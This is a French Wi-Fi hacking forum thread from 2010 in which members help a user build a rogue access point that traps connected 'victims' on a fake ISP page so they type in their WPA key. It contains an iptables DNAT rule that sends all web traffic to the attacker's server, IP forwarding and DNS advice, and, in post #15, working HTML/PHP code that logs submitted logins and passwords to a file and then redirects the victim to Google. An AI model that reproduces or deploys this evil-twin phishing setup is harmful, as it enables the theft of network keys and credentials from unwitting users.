Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 12-02-2010 20:29:16

us3r
Membre Hyperactif
Lieu : Besancon
Inscription : 26-10-2009
Messages : 61

Demande de tutoriel

Bonjour,

Voila quelques temps que je m'essaye à airbase-ng afin de trouver ma clé WPA. J'ai lu beaucoup de sujet sur le forum mais aucun n'explique la procédure d'une facon claire et complete.
Je comprends l'utilisation d'airbase-ng et j'arrive à connecter un client sur le fake AP. J'ai lu les sujet relatifs à la création de fausses pages Orange, Free, etc...mais personne ne parle de la manière de les utiliser.
C'est pourquoi je demande à ce que l'on m'explique tout ça :

Je n'arrive pas à :

- Faire en sorte que le client accède à Internet une fois connecté à ma rogue AP.
- Lui afficher une fausse page internet ou il lui ait demandé de rentrer sa clé WPA.
- Lui donner l'autorisation de naviguer sur Internet après avoir rentré sa clé.

En vous remerciant,

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 12-02-2010 21:52:40

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Demande de tutoriel

ceci est simple sous bt3f mais je ne tenterais pas sous bt4F

je te conseil de revenir a bt3F et d'utiliser atxwpa + xamp pour linux et de restreindre ton fichier dhcp a une ip pour un pc celui là connecter au faux ap et qui fait une dns spouf sur ton faux serveur web et une ip pour la victime

tous est sur le forum mais redescend d'une version c mon conseil

mr l'admin si je dis des bêtises dites le moi wink (faut que je fasse un tuto mais ça prend du temps)

Cordialement

Hors Ligne

#3 12-02-2010 22:51:07

us3r
Membre Hyperactif
Lieu : Besancon
Inscription : 26-10-2009
Messages : 61

Re : Demande de tutoriel

Attends, j'essaye d'apprendre et ce que tu dis et déja trop compliqué pour moi ^^.
Oui, j'utilise BT4 et WKG fonctionne pareil que AtxWpa mais cela ne fait que détourner mes questions et non y répondre.
Peut etre ai-je tort mais pour donner l'accès au client, il y a dhcpd.conf a configurer ainsi que IPTABLES ?
Si oui, je voudrais une explication quand a leur configuration.

Hors Ligne

#4 12-02-2010 23:05:52

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Demande de tutoriel

je n'utilise pas bt4

ce que tu veut faire je le fait ça marche très bien grâce a atxwpa (merci atrax) je ne dis pas que sous bt4 ce n'est pas possible mais je ne saurais pas le faire sans apprendre ce que je sais déjà si tu redescend sous bt3F je pourrais t'aider

je vais faire un tuto y ' en a pour 2 semaine maxi j'ai commencer...

Hors Ligne

#5 12-02-2010 23:18:14

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Demande de tutoriel

us3r, il faudrait que tu vérifies si tu as bien un "1" en résultat de cette commande : [c]cat /proc/sys/net/ipv4/ip_forward[/c], c'est ce qui permet au système de "faire suivre" les connexions.

Si la commande te répond 0, exécute celle-là :
[c]echo 1 > /proc/sys/net/ipv4/ip_forward[/c]

Hors Ligne

#6 13-02-2010 14:19:25

us3r
Membre Hyperactif
Lieu : Besancon
Inscription : 26-10-2009
Messages : 61

Re : Demande de tutoriel

Salut,

J'ai essayé mais ca ne change rien.
Mais mes questions sont en rouge un peu plus haut...

Hors Ligne

#7 13-02-2010 18:51:25

us3r
Membre Hyperactif
Lieu : Besancon
Inscription : 26-10-2009
Messages : 61

Re : Demande de tutoriel

Re-Salut,

Alors j'ai fais des test cette aprem. Je réussi et créer l'AP et à configurer le dhcp pour qu'il donne à ma station client ( XP ) des adresses IP. C'est peu je sais mais j'suis content big_smile

1ere Demande :

Mon PC sous backtrack utilise une carte Wifi pour créer la rogue AP et je possède une connexion eth0, donc cablée. Je voudrais faire en sorte que mon pc client puisse utiliser cette carte réseau pour naviguer sur Internet.


2eme Demande :

Je démarre un serveur Web ( KDE => Services => HTTPD => Start HTTPD ). J'arrive à le contacter depuis mon PC client en rentrer l'adresse IP ( 10.0.0.1 ) dans la barre des taches. Mon but serait de faire en sorte que, peut importe l'adresse tapé dans la barre des taches, on tombe automatiquement sur cette page.


En vous remerciant,

Hors Ligne

#8 13-02-2010 22:25:32

Dack
Membre Irremplaçable
Inscription : 07-04-2009
Messages : 1 257

Re : Demande de tutoriel

Alors pour ta deuxieme demande, faut que tu modifies ton fichier host qui se trouve dans l'ordi de la victime, regarde ici http://lelogiciellibre.net/tutoriaux/fichier-hosts.php ou http://fr.wikipedia.org/wiki/Hosts

Hors Ligne

#9 13-02-2010 22:53:16

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Demande de tutoriel

damienmou a écrit :

Alors pour ta deuxieme demande, faut que tu modifies ton fichier host qui se trouve dans l'ordi de la victime, regarde ici http://lelogiciellibre.net/tutoriaux/fichier-hosts.php ou http://fr.wikipedia.org/wiki/Hosts

ceci implique d'avoir accès à une machine du réseau-cible AVANT d'avoir récupéré la clé dudit réseau... L'attaque perd son utilité hmm

Ce que tu veux faire, us3r, s'apparente à un portail captif (type Hotspot : connexion forcée sur une certaine page jusqu'au moment où tu as entré un mot de passe/cliqué sur "j'accepte les conditions"/...). Tu peux essayer de greffer Chillispot ou NoCatSplash sur BackTrack, mais je pense que ca n'a jamais été fait (et je sais pas du tout si c'est difficile à faire ou pas).

Si tu veux simplement rediriger tout le trafic entrant sur ton AP vers une certaine page (donc une certaine adresse, tu peux y aller par iptables :

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:<port>

(merci à Nagual pour son post sur Remote-Exploit, ainsi que Debuntu pour les précisions)

Pour ce qui est de ta première question, normalement si le ip_forward est bien à 1 (le truc du echo), le transfert de connexion est bien actif; rien d'autre à faire. Par contre il est possible que ton client aie un problème de DNS (du à une mauvaise configuration du dhcp). Quand tu as un client connecté sur ton Rogue AP, essaie un peu de pinger une IP directement (démarrer > exécuter > cmd > [c]ping 8.8.8.8[/c]). Si ca marche, on sait où est le problème. Si ca ne marche pas, ben... faut chercher ailleurs big_smile

Hors Ligne

#10 13-02-2010 23:35:13

us3r
Membre Hyperactif
Lieu : Besancon
Inscription : 26-10-2009
Messages : 61

Re : Demande de tutoriel

Merci de ton aide antares145. J'ai essayé de pinguer 8.8.8.8 et l'adresse IP de mon site internet depuis le PC client. Le ping passe bien, donc c'est un probleme de DNS.
Mon PC client obtient 10.0.0.1 comme adresse DNS et paserelle par défaut.
Est-ce bon ? D'ou vient le probleme alors ?

Hors Ligne

#11 13-02-2010 23:44:02

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Demande de tutoriel

Le problème vient sans doute du fait que ton rogue AP (10.0.0.1 en l'occurrence) ne propose pas de redirection/serveur/cache DNS, ou bien ton dnsmasq est mal/pas configuré, ou bien c'est ton dhcp.conf qui est foireux.

Dans tous les cas, il y a certainement moyen de spécifier dans ton dhcp.conf quel serveur DNS utiliser, tu n'a qu'à mettre le fameux 8.8.8.8 (le DNS de Google, en fait), mais libre à toi d'en mettre un autre (externe à BackTrack).
En poussant le vice, tu pourrais même configurer un DNS piégé sur BackTrack, pour que certaines adresses renvoient vers une IP "bien choisie", avec une page HTML bien choisie, etc... Mais ca je ne sais pas du tout comment faire wink

Hors Ligne

#12 14-02-2010 01:33:34

us3r
Membre Hyperactif
Lieu : Besancon
Inscription : 26-10-2009
Messages : 61

Re : Demande de tutoriel

Il est bientot 1h30 du matin et j'viens de finir mes tests et deviner quoi : J'y suis arrivé !!!
Mon PC client arrive désormais a naviguer sur le net.
De plus, en lancant la commande  "  iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1 ", il est automatiquement redirigé sur une page web. Celle-ci est index.html et elle se trouve dans /var/www/ apparement. Merci à toi antares145 pour ton aide sans laquelle je n'aurais pas réussi big_smile

Mes 2 questions sont maintenant résolues.
Comme on dit: jamais 2 sans 3....donc :

3eme Demande :

Comment utilise-t-on les fausses pages WEB en php ( orange, free, numérical,... ) de la discution " Les pages rogue AP finalisées: le topic dédié" ?
Je rappelle que pour l'instant j'ai un index.html. En clair, mon but final serait que l'utilisateur tombe sur cette fausse page, rentre sa clé WPA et clique sur un bouton. Une fois ceci fait, les infos sont récupérés dans un fichier texte.

Merci de votre aide,

-----------------------------------------
      Up..I need help please
-----------------------------------------

Dernière modification par us3r (15-02-2010 03:08:48)

Hors Ligne

#13 16-02-2010 22:38:09

us3r
Membre Hyperactif
Lieu : Besancon
Inscription : 26-10-2009
Messages : 61

Re : Demande de tutoriel

Toujours personne pour m'aider par rapport à l'utilisation des pages PHP avec une rogue AP ???

Hors Ligne

#14 16-02-2010 22:50:21

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Demande de tutoriel

Mais qu'ils sont impatients, ces jeunes (ou moins jeunes)... roll

Personnellement, je n'y connais rien en HTML/PHP, et c'est à mon avis le cas de nombreux membres ici (c'est pas vraiment la spécialité locale). Donc il va falloir que t'attende qu'un mec qui gère ca passe par ici, et ca peut durer plusieurs jours, voire même semaines, donc le "up" au bout de 24 heures c'est peut-être un peu prématuré, tu crois pas ? smile

Sinon, si tu prends les pages du topic que tu cites, et que tu les renommes index.html, en les copiant dans le bon dossier avec leurs dépendances, ca marche pas ? Pour le coup du formulaire PHP qui tape ses résultats dans un fichier texte, à mon avis avec un tutorial de base tu dois pouvoir trouver ca (surtout que tu gères déjà l'HTML si j'en crois ton site personnel wink)

Hors Ligne

#15 17-02-2010 02:21:58

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Demande de tutoriel

imginos que tu veuille enregistrer un id et un passe dans un fichier txt

le code html serais

<form action = "traitement.php" method="post" name="form">
 <p>identifiant :<br /> 
<input type = "text" name = "sujet" tabindex="20" size="8" maxlength="50"><br />
 mot de passe :<br />
<input type = "password" name = "texte" tabindex="20" size="8" maxlength="50"><br />
<a onmousedown="document.form.submit();" href="javascript:;">Connections</a>
</p>
</form>

le code traitement.php pour enregistrer les données du formulaire en .txt

  <?php
$login = $_POST['sujet'];
$password = $_POST['texte'];
$file = fopen($login.'.txt',"w");
fwrite($file,"LOGIN : ".$login."\nPASSWORD : ".$password);
fclose($file);
?>
<script>
location.replace("http://www.google.fr");
</script>
   </body>

maintenant cela s'apprend sur le site du zéro il faut se donner la peine!! demander du tous cuit c pas comme ça que tu va comprendre les failles

je n'irais pas plus loin pour moi bonne continuation dans ton apprentissage

Cordialement

Dernière modification par Veidam (19-02-2010 11:52:34)

Hors Ligne

#16 18-02-2010 11:40:04

Dack
Membre Irremplaçable
Inscription : 07-04-2009
Messages : 1 257

Re : Demande de tutoriel

Ouai va voir sur le sdz pour apprendre,  en plus Mateo est en train de refaire le tuto sur le PHP/SQL

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.03 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]